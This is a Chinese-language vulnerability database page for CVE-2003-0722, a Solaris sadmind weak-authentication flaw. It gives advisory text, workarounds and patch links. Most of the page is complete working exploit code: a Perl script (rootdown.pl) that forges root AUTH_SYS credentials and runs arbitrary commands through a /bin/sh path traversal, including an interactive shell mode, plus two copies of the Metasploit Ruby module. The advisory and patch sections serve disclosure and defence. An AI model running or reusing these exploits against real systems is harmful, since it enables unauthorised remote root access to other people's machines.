CVE-2003-0722
CVSS10.0
发布时间 :2003-09-22 00:00:00
修订时间 :2016-10-17 22:36:54
NMCOEPS    

[原文]The default installation of sadmind on Solaris uses weak authentication (AUTH_SYS), which allows local and remote attackers to spoof Solstice AdminSuite clients and gain root privileges via a certain sequence of RPC packets.


[CNNVD]Sun Solaris sadmind远程执行命令漏洞(CNNVD-200309-022)

        
        sadmind是Solaris所带的一个守护程序,Solstice AdminSuite应用程序通过它来执行分布式的系统管理操作。
        Sun sadmind的验证实现存在问题,远程攻击者可以利用这个漏洞以root用户权限在系统上执行任意命令。
        Sun sadmind的验证实现有三个安全等级用来判断客户端是否有权在服务器上执行某个操作。如果安全等级为0,则将所有客户端的用户和组标识设置为nobody,然后判断是否nobody用户或组有权限访问某个操作,这仅用于测试目的。第二个等级是1,这时将认证类型设为WEAK(弱),客户端的用户/组标识会根据用户提供的认证信息进行设置,客户端可以使用AUTH_SYS或者AUTH_DES认证机制发送认证信息。缺省sadmind使用这一安全等级。第三个等级是2,认证类型为STRONG, 必须使用AUTH_DES认证。
        在使用弱认证时,由于AUTH_SYS非常容易伪造用户身份,所以sadmind的man手册中建议只有在真正安全的环境中才使用此安全等级。这时,通过发送AUTH_SYS认证请求,用户可以伪装成服务器上的root用户发送请求,从而以root身分执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1273Solaris SAdmin Client Credentials Remote Administrative Access Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0722
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0722
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200309-022
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0115.html
(UNKNOWN)  VULNWATCH  20030918 Solaris SADMIND Exploitation
http://marc.info/?l=bugtraq&m=106391959014331&w=2
(UNKNOWN)  BUGTRAQ  20030918 Solaris SADMIND Exploitation
http://sunsolve.sun.com/search/document.do?assetkey=1-26-56740-1&searchclause=security
(UNKNOWN)  SUNALERT  56740
http://www.ciac.org/ciac/bulletins/n-148.shtml
(UNKNOWN)  CIAC  N-148
http://www.idefense.com/advisory/09.16.03.txt
(UNKNOWN)  MISC  http://www.idefense.com/advisory/09.16.03.txt
http://www.kb.cert.org/vuls/id/41870
(UNKNOWN)  CERT-VN  VU#41870
http://www.securityfocus.com/bid/8615
(UNKNOWN)  BID  8615

- 漏洞信息

Sun Solaris sadmind远程执行命令漏洞
危急 设计错误
2003-09-22 00:00:00 2005-10-20 00:00:00
远程  
        
        sadmind是Solaris所带的一个守护程序,Solstice AdminSuite应用程序通过它来执行分布式的系统管理操作。
        Sun sadmind的验证实现存在问题,远程攻击者可以利用这个漏洞以root用户权限在系统上执行任意命令。
        Sun sadmind的验证实现有三个安全等级用来判断客户端是否有权在服务器上执行某个操作。如果安全等级为0,则将所有客户端的用户和组标识设置为nobody,然后判断是否nobody用户或组有权限访问某个操作,这仅用于测试目的。第二个等级是1,这时将认证类型设为WEAK(弱),客户端的用户/组标识会根据用户提供的认证信息进行设置,客户端可以使用AUTH_SYS或者AUTH_DES认证机制发送认证信息。缺省sadmind使用这一安全等级。第三个等级是2,认证类型为STRONG, 必须使用AUTH_DES认证。
        在使用弱认证时,由于AUTH_SYS非常容易伪造用户身份,所以sadmind的man手册中建议只有在真正安全的环境中才使用此安全等级。这时,通过发送AUTH_SYS认证请求,用户可以伪装成服务器上的root用户发送请求,从而以root身分执行任意命令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 禁止'sadmind'服务或者将其安全等级提高到2。以Solaris 8系统为例:
         1. 转变成root用户
         $ su -
         #
         2. 杀掉正在运行的sadmind进程
         # ps -ef|grep sadmind|grep -v grep
         # kill -9
         3. 编辑/etc/inetd.conf
         注释掉包含sadmind的行
         #100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind
         或者将samind的安全等级设为2:
         100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -S 2
         4. 然后重新启动inetd
         # kill -HUP
         其他操作系统可以参考上述步骤。
        * 在防火墙上过滤对RPC portmap端口(TCP/UDP 111)以及sadmind服务监听端口的访问。注意这种方式并不能防止网络内部对主机的攻击。
        厂商补丁:
        Sun
        ---
        Sun已经为此发布了一个安全公告(56740),请按公告里的指示修补:
        56740:Security Issue Involving the Solaris sadmind(1M) Daemon
        链接:
        http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F56740

        补丁下载:
        SPARC平台
        Solaris 7
        
        http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116456&rev=01

        Solaris 8
        
        http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116455&rev=01

        Solaris 9
        
        http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116453&rev=01

        x86平台
        Solaris 7
        
        http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116457&rev=02

        Solaris 8
        
        http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116442&rev=01

        Solaris 9
        
        http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=116454&rev=01

- 漏洞信息 (101)

Solaris Sadmind Default Configuration Remote Root Exploit (EDBID:101)
solaris remote
2003-09-19 Verified
111 H D Moore
N/A [点击下载]
#!/usr/bin/perl -w
##################

##
#      Title: rootdown.pl
#      Purpose: Solaris Remote command executiong via sadmind
#      Author: H D Moore hdm at metasploit.com
#      Copyright: Copyright (C) 2003 METASPLOIT.COM
##


use strict;
use POSIX;
use IO::Socket;
use IO::Select;
use Getopt::Std;

my $VERSION = "1.0";
my %opts;

getopts("h:p:c:r:iv", \%opts);

if ($opts{v}) { show_info() }

if (! $opts{h}) { usage() }

my $target_host = $opts{h};

my $target_name = "exploit";

my $command = $opts{c} ? $opts{c} : "touch /tmp/OWNED_BY_SADMIND_\$\$";
my $portmap = $opts{r} ? $opts{r} : 111;


##
# Determine the port used by sadmind  
##

my $target_port = $opts{p} ? $opts{p} : rpc_getport($target_host, $portmap, 100232, 10);

if (! $target_port)
{
    print STDERR "Error: could not determine port used by sadmind\n";
    exit(0);
}

##
#  Determine the hostname of the target
##

my $s = rpc_socket($target_host, $target_port);
my $x = rpc_sadmin_exec($target_name, "id");
print $s $x;
my $r = rpc_read($s);
close ($s);

if ($r && $r =~ m/Security exception on host (.*)\.  USER/)
{
    $target_name = $1;
} else {
    print STDERR "Error: could not obtain target hostname.\n";
    exit(0);
}


##
#  Execute commands :)
##


my $interactive = 0;

if ($opts{i}) { $interactive++ }

do {

    if ($opts{i}) { $command = command_prompt() } else 
    {
        print STDERR "Executing command on '$target_name' via port $target_port\n";
    }
    
    $s = rpc_socket($target_host, $target_port);
    $x = rpc_sadmin_exec($target_name, $command);
    print $s $x;
    $r = rpc_read($s);
    close ($s);

    if ($r) 
    {  
        # Command Failed
        if (length($r) == 36 && substr($r, 24, 4) eq "\x00\x00\x00\x29")
        {
            print STDERR "Error: something went wrong with the RPC format.\n";
            exit(0);
        }

        # Command might have failed
        if (length($r) == 36 && substr($r, 24, 4) eq "\x00\x00\x00\x2b")
        {
            print STDERR "Error: something may have gone wrong with the sadmind format\n";
        }

        # Confirmed success
        if (length($r) == 36 && substr($r, 24, 12) eq ("\x00" x 12))
        {
            print STDERR "Success: your command has been executed successfully.\n";
        }    

        if (length($r) != 36)  { print STDERR "Unknown Response: $r\n" }
        
    } else {
        print STDERR "Error: no response recieved, you may want to try again.\n";
        exit(0);
    }
    
} while ($interactive);

exit(0);

sub usage {
    print STDERR "\n";
    print STDERR "+-----==[ rootdown.pl => Solaris SADMIND Remote Command Execution\n\n";
    print STDERR "       Usage:   $0 -h <target> -c <command> [options]\n";
    print STDERR "     Options:\n";
    print STDERR "                -i\tStart interactive mode (for multiple commands)\n";
    print STDERR "                -p\tAvoid the portmapper and use this sadmind port\n";   
    print STDERR "                -r\tQuery alternate portmapper on this UDP port\n";
    print STDERR "                -v\tDisplay information about this exploit\n";    
    
    print STDERR "\n\n";
    exit(0);
}

sub show_info {

print "\n\n";
print "   Name:  rootdown.pl\n";
print " Author:  H D Moore <hdm\@metasploit.com>\n";
print "Version:  $VERSION\n\n";

# not finsihed :)
print 
"This exploit targets a weakness in the default security settings
of the sadmind RPC application. This application is installed and
enabled by default on most versions of the Solaris operating
system.\n\n".

"The sadmind application defaults to a weak security mode known as
AUTH_SYS (or AUTH_UNIX under Linux/BSD). When running in this mode,
the service will accept a structure containing the user and group
IDs as well as the originating system name. These values are not
validated in any form and are completely controlled by the client.
If the standard sadmin RPC API calls are used to generate the request,
the ADM_CLIENT_HOST parameter is filled in with the hostname of the 
client system. If the RPC packet is modified so that this field is
set to the hostname of the remote system, it will be processed as 
if it was a local request. If the user ID is set to zero or the
value of any user in the sysadmin group, it is possible to call
arbitrary methods in any class available to sadmind.\n\n".

"If the Solstice AdminSuite client software has not been installed,
the only class available is 'system', which only contains a single
method called 'admpipe'. The strings within this program seem to
suggest that it can be used run arbitrary commands, however I chose
a different method of command execution. Since each method is simply 
an executable in the class directory, it is possible to use a 
standard directory traversal attack to execute any application.
We can pass arguments to these methods using the standard API.

An example of spawning a shell which executes the 'id' command:

    # apm -c system -m ../../../../../bin/sh -a arg1=-c arg2=id\n\n".

"To exploit this vulnerability, we must create a RPC packet that
calls the '/bin/sh' method, passing it the parameter of the command
we want to execute. To do this, packet dumps of the 'apm' tool
were obtained and the format was slowly mapped. The hostname of 
the target system must be known for this exploit to work, however
when sadmind is called with the wrong name, it replies with a
'ACCESS DENIED' error message containing the correct name. The 
final code does the following:

1) Queries the portmapper to determine the sadmind port
2) Sends an invalid request to sadmind to obtain the hostname
3) Uses the hostname to forge the RPC packet and execute commands


This vulnerability was reported by Mark Zielinski and disclosed by iDefense.

Related URLs:

 - http://www.idefense.com/advisory/09.16.03.txt
 - http://docs.sun.com/db/doc/816-0211/6m6nc676b?a=view
";





exit(0);
}

sub command_prompt {
    select(STDOUT); $|++;
    
    print STDOUT "\nsadmind> ";
    my $command = <STDIN>;
    chomp($command);
    if (! $command || lc($command) eq "quit" || lc($command) eq "exit")
    {
        print "\nExiting interactive mode...\n";
        exit(0);
    }
    return ($command)
}

sub rpc_socket {
    my ($target_host, $target_port) = @_;
    my $s = IO::Socket::INET->new
    (
        PeerAddr => $target_host, 
        PeerPort => $target_port,
        Proto    => "udp",
        Type     => SOCK_DGRAM
    );

    if (! $s)
    {
        print "\nError: could not create socket to target: $!\n";
        exit(0);
    }

    select($s); $|++;
    select(STDOUT); $|++;
    nonblock($s);
    return($s);
}

sub rpc_read {
    my ($s) = @_;
    my $sel = IO::Select->new($s);
    my $res;
    my @fds = $sel->can_read(4);
    foreach (@fds) { $res .= <$s>; }
    return $res;
}

sub nonblock {
    my ($fd) = @_;
    my $flags = fcntl($fd, F_GETFL,0);
    fcntl($fd, F_SETFL, $flags|O_NONBLOCK);
}

sub rpc_getport {
    my ($target_host, $target_port, $prog, $vers) = @_;
    
    my $s = rpc_socket($target_host, $target_port);

    my $portmap_req =
        
        pack("L", rand() * 0xffffffff) . # XID
        "\x00\x00\x00\x00".              # Call
        "\x00\x00\x00\x02".              # RPC Version
        "\x00\x01\x86\xa0".              # Program Number  (PORTMAP)
        "\x00\x00\x00\x02".              # Program Version (2)
        "\x00\x00\x00\x03".              # Procedure (getport)
        ("\x00" x 16).                   # Credentials and Verifier
        pack("N", $prog) .
        pack("N", $vers).
        pack("N", 0x11).                 # Protocol: UDP
        pack("N", 0x00);                 # Port: 0

    print $s $portmap_req;

    my $r = rpc_read($s);
    close ($s);
    
    if (length($r) == 28) 
    { 
        my $prog_port = unpack("N",substr($r, 24, 4));
        return($prog_port); 
    }
    
    return undef;
}


sub rpc_sadmin_exec {

    my ($hostname, $command) = @_;
    my $packed_host = $hostname . ("\x00" x (59 - length($hostname)));
    
    
    my $rpc =
        pack("L", rand() * 0xffffffff) . # XID
        "\x00\x00\x00\x00".              # Call
        "\x00\x00\x00\x02".              # RPC Version
        "\x00\x01\x87\x88".              # Program Number  (SADMIND)
        "\x00\x00\x00\x0a".              # Program Version (10)
        "\x00\x00\x00\x01".              # Procedure
        "\x00\x00\x00\x01";              # Credentials (UNIX)
                                         # Auth Length is filled in

    # pad it up to multiples of 4
    my $rpc_hostname = $hostname;
    while (length($rpc_hostname) % 4 != 0) { $rpc_hostname .= "\x00" }
    
    my $rpc_auth =
        # Time Stamp
        pack("N", time() + 20001) .

        # Machine Name
        pack("N", length($hostname)) . $rpc_hostname .

        "\x00\x00\x00\x00".              # UID = 0
        "\x00\x00\x00\x00".              # GID = 0
        "\x00\x00\x00\x00";              # No Extra Groups  


    $rpc .= pack("N", length($rpc_auth)) . $rpc_auth . ("\x00" x 8);

    my $header =
    
    # Another Time Stamp
    reverse(pack("L", time() + 20005)) .

    "\x00\x07\x45\xdf".
    
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    "\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04".
    
    "\x7f\x00\x00\x01".                 # 127.0.0.1
    "\x00\x01\x87\x88".                 # SADMIND
    
    "\x00\x00\x00\x0a\x00\x00\x00\x04".
    
    "\x7f\x00\x00\x01".                 # 127.0.0.1
    "\x00\x01\x87\x88".                 # SADMIND

    "\x00\x00\x00\x0a\x00\x00\x00\x11\x00\x00\x00\x1e".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    "\x00\x00\x00\x00".

    "\x00\x00\x00\x3b". $packed_host.

    "\x00\x00\x00\x00\x06" . "system".
    
    "\x00\x00\x00\x00\x00\x15". "../../../../../bin/sh". "\x00\x00\x00";
    
    # Append Body Length ^-- Here

    my $body = 
    "\x00\x00\x00\x0e". "ADM_FW_VERSION".
    "\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00".
    "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00".
    
    "\x00\x00\x00\x08". "ADM_LANG".
    "\x00\x00\x00\x09\x00\x00\x00\x02\x00\x00".
    "\x00\x01". "C" . 
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    
    "\x00\x00\x00\x0d". "ADM_REQUESTID".
    "\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x12\x00\x00\x00\x11".
    "0810:1010101010:1"."\x00\x00\x00".
    "\x00\x00\x00\x00\x00\x00\x00\x00".

    "\x00\x00\x00\x09". "ADM_CLASS".
    "\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x07".
    "\x00\x00\x00\x06" . "system" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    
    
    "\x00\x00\x00\x0e" . "ADM_CLASS_VERS" .
    "\x00\x00\x00\x00\x00\x09\x00\x00\x00\x04".
    "\x00\x00\x00\x03". "2.1".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    
    
    "\x00\x00\x00\x0a" . "ADM_METHOD" . 
    "\x00\x00\x00\x00\x00\x09\x00\x00\x00\x16".
    "\x00\x00\x00\x15". "../../../../../bin/sh" . 
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    
    "\x00\x00\x00\x08". "ADM_HOST" .
    "\x00\x00\x00\x09\x00\x00\x00\x3c\x00\x00\x00\x3b".
    $packed_host.

    "\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    "\x00\x00\x00\x0f". "ADM_CLIENT_HOST".
    "\x00\x00\x00\x00\x09".
    
    pack("N", length($hostname) + 1) .
    pack("N", length($hostname)) .
    $rpc_hostname .
    "\x00\x00\x00\x00". "\x00\x00\x00\x00".
    
    "\x00\x00\x00\x11" . "ADM_CLIENT_DOMAIN".
    "\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00".
    "\x00\x00\x00\x00\x00\x00".
    
    "\x00\x00\x00\x11" . "ADM_TIMEOUT_PARMS".
    "\x00\x00\x00\x00\x00".
    "\x00\x09\x00\x00\x00\x1c".
    "\x00\x00\x00\x1b" . "TTL=0 PTO=20 PCNT=2 PDLY=30".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    
    
    "\x00\x00\x00\x09" . "ADM_FENCE" .
    "\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    "\x00\x00\x00\x00\x00\x00\x01\x58\x00\x00\x00\x00\x00\x00\x09\x00".
    "\x00\x00\x03\x00\x00\x00\x02" . "-c" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x59\x00".
    "\x00\x00\x00\x00\x00\x09\x00\x00\x02\x01\x00\x00\x02\x00".

    $command . ("\x00" x (512 - length($command))).

    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10".
    "netmgt_endofargs";

    my $res = $rpc . $header . pack("N", (length($body) + 4 + length($header)) - 330) . $body;

    return($res);
}



# milw0rm.com [2003-09-19]
		

- 漏洞信息 (16324)

Solaris sadmind Command Execution (EDBID:16324)
multiple remote
2010-06-22 Verified
0 metasploit
N/A [点击下载]
##
# $Id: sadmind_exec.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::SunRPC

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Solaris sadmind Command Execution',
			'Description'    => %q{
					This exploit targets a weakness in the default security
				settings of the sadmind RPC application. This server is
				installed and enabled by default on most versions of the
				Solaris operating system.

				Vulnerable systems include solaris 2.7, 8, and 9
			},
			'Author'         => [ 'vlad902 <vlad902@gmail.com>', 'hdm', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9583 $',
			'References'     =>
				[
					['CVE', '2003-0722'],
					['OSVDB', '4585'],
					['BID', '8615'],
					['URL', 'http://lists.insecure.org/lists/vulnwatch/2003/Jul-Sep/0115.html'],
				],
			'Privileged'     => true,
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'    => 2000,
					'BadChars' => "\x00",
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DisclosureDate' => 'Sep 13 2003',
			'DefaultTarget' => 0
		))

		register_options(
			[
				OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),
				OptInt.new('GID', [false, 'GID to emulate', 0]),
				OptInt.new('UID', [false, 'UID to emulate', 0])
			], self.class
		)
	end

	def exploit
		sunrpc_create('udp', 100232, 10)
		sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], [])

		if !datastore['HOSTNAME']
			print_status('attempting to determine hostname')
			response = sadmind_request(rand_text_alpha(rand(10) + 1), "true")

			if !response
				print_error('no response')
				return
			end

			match = /Security exception on host (.*)\.  USER/.match(response)
			if match
				hostname = match.captures[0]
				print_status("found hostname: #{hostname}")
			else
				print_error('unable to determine hostname')
				return
			end
		else
			hostname = datastore['HOSTNAME']
		end

		response = sadmind_request(hostname, payload.encoded)
		sunrpc_destroy

		if /Security exception on host/.match(response)
			print_error('exploit failed')
			return
		else
			print_status('exploit did not give us an error, this is good...')
			select(nil,nil,nil,1)
			handler
		end
	end

	def sadmind_request(host, command)
		header =
			XDR.encode(0) * 7 +
			XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \
				4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \
				host, 'system', '../../../bin/sh')

		body =
			do_int('ADM_FW_VERSION', 1) +
			do_string('ADM_LANG', 'C') +
			do_string('ADM_REQUESTID', '00009:000000000:0') +
			do_string('ADM_CLASS', 'system') +
			do_string('ADM_CLASS_VERS', '2.1') +
			do_string('ADM_METHOD', '../../../bin/sh') +
			do_string('ADM_HOST', host) +
			do_string('ADM_CLIENT_HOST', host) +
			do_string('ADM_CLIENT_DOMAIN', '') +
			do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
			do_int('ADM_FENCE', 0) +
			do_string('X', '-c') +
			do_string('Y', command) +
			XDR.encode('netmgt_endofargs')

		request = header + XDR.encode(header.length + body.length - 326) + body

		ret = sunrpc_call(1, request)
		return XDR.decode!(ret, Integer, Integer, String)[2]
	end

	def do_string(str1, str2)
		XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
	end

	def do_int(str, int)
		XDR.encode(str, 3, 4, int, 0, 0)
	end
end
		

- 漏洞信息 (F82326)

Solaris sadmind Command Execution (PacketStormID:F82326)
2009-10-28 00:00:00
H D Moore,cazz,vlad902  metasploit.com
exploit
solaris
CVE-2003-0722
[点击下载]

This exploit targets a weakness in the default security settings of the sadmind RPC application. This server is installed and enabled by default on most versions of the Solaris operating system. Vulnerable systems include solaris 2.7, 8, and 9.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::SunRPC

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Solaris sadmind Command Execution',
			'Description'    => %q{
				This exploit targets a weakness in the default security
				settings of the sadmind RPC application. This server is
				installed and enabled by default on most versions of the
				Solaris operating system.

				Vulnerable systems include solaris 2.7, 8, and 9
			},
			'Author'         => [ 'vlad902 <vlad902@gmail.com>', 'hdm', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2003-0722'],
					['OSVDB', '4585'],
					['BID', '8615'],
					['URL', 'http://lists.insecure.org/lists/vulnwatch/2003/Jul-Sep/0115.html'],
				],
			'Privileged'     => true,
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'    => 2000,
					'BadChars' => "\x00",
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DisclosureDate' => 'Sep 13 2003',
			'DefaultTarget' => 0
		))

		register_options(
			[
				OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),
				OptInt.new('GID', [false, 'GID to emulate', 0]),
				OptInt.new('UID', [false, 'UID to emulate', 0])
			], self.class
		)
	end

	def exploit
		sunrpc_create('udp', 100232, 10)
		sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], [])
	
		if !datastore['HOSTNAME']
			print_status('attempting to determine hostname')
			response = sadmind_request(rand_text_alpha(rand(10) + 1), "true")
	
			if !response
				print_error('no response')
				return
			end
	
			match = /Security exception on host (.*)\.  USER/.match(response)
			if match
				hostname = match.captures[0]
				print_status("found hostname: #{hostname}")
			else
				print_error('unable to determine hostname')
				return
			end
		else
			hostname = datastore['HOSTNAME']
		end

		response = sadmind_request(hostname, payload.encoded)
		sunrpc_destroy

		if /Security exception on host/.match(response)
			print_error('exploit failed')
			return
		else
			print_good('exploit did not give us an error, this is good...')
			sleep(1)
			handler
		end
	end

	def sadmind_request(host, command)
		header =
			XDR.encode(0) * 7 +
			XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \
				4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \
				host, 'system', '../../../bin/sh')

		body =
			do_int('ADM_FW_VERSION', 1) +
			do_string('ADM_LANG', 'C') +
			do_string('ADM_REQUESTID', '00009:000000000:0') +
			do_string('ADM_CLASS', 'system') +
			do_string('ADM_CLASS_VERS', '2.1') +
			do_string('ADM_METHOD', '../../../bin/sh') +
			do_string('ADM_HOST', host) +
			do_string('ADM_CLIENT_HOST', host) +
			do_string('ADM_CLIENT_DOMAIN', '') +
			do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
			do_int('ADM_FENCE', 0) +
			do_string('X', '-c') +
			do_string('Y', command) +
			XDR.encode('netmgt_endofargs')

		request = header + XDR.encode(header.length + body.length - 326) + body

		ret = sunrpc_call(1, request)
		return XDR.decode!(ret, Integer, Integer, String)[2]
	end 

	def do_string(str1, str2)
		XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
	end

	def do_int(str, int)
		XDR.encode(str, 3, 4, int, 0, 0)
	end
end

    

- 漏洞信息

4585
Solaris sadmind AUTH_SYS Credential Remote Command Execution
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

Sun Microsystems Solaris contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to a flaw in the sadmind daemon's handling of AUTH_SYS requests. If an attacker sends a specially crafted Remote Procedure Call (RPC) packet, they may be able to forge the AUTH_SYS credentials. This would allow the execution of arbitrary commands with root privileges.

- 时间线

2003-09-13 Unknow
2003-09-13 Unknow

- 解决方案

Sun Microsystems has released a patch to address this issue. It is also possible to correct the flaw by implementing the following workarounds: Disable the sadmind daemon. SPARC Platform - Patch 116456-01 x86 Platform - Patch 116457-02

- 相关参考

- 漏洞作者

- 漏洞信息

Sun Solaris SAdmin Client Credentials Remote Administrative Access Vulnerability
Design Error 8615
Yes No
2003-09-16 12:00:00 2007-11-15 12:39:00
Discovery credited to Mark Zielinski.

- 受影响的程序版本

Sun Trusted Solaris 8.0 x86
Sun Trusted Solaris 8.0
Sun Trusted Solaris 7.0 x86
Sun Trusted Solaris 7.0
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6

- 漏洞讨论

An issue in the Sun Solaris 'sadmin' service may allow a remote user to gain unauthorized administrative access.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Exploit code has been published.

An exploit (solaris_sadmind_exec.pm) has been released as part of the MetaSploit Framework 2.0.

- 解决方案

Sun has released an advisory regarding this issue and has supplied specific instructions on securing a vulnerable system until a fix is released. See the referenced advisory for details.


Sun Solaris 7.0

Sun Solaris 8_x86

Sun Solaris 8_sparc

Sun Solaris 9

Sun Solaris 7.0_x86

Sun Solaris 9_x86

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站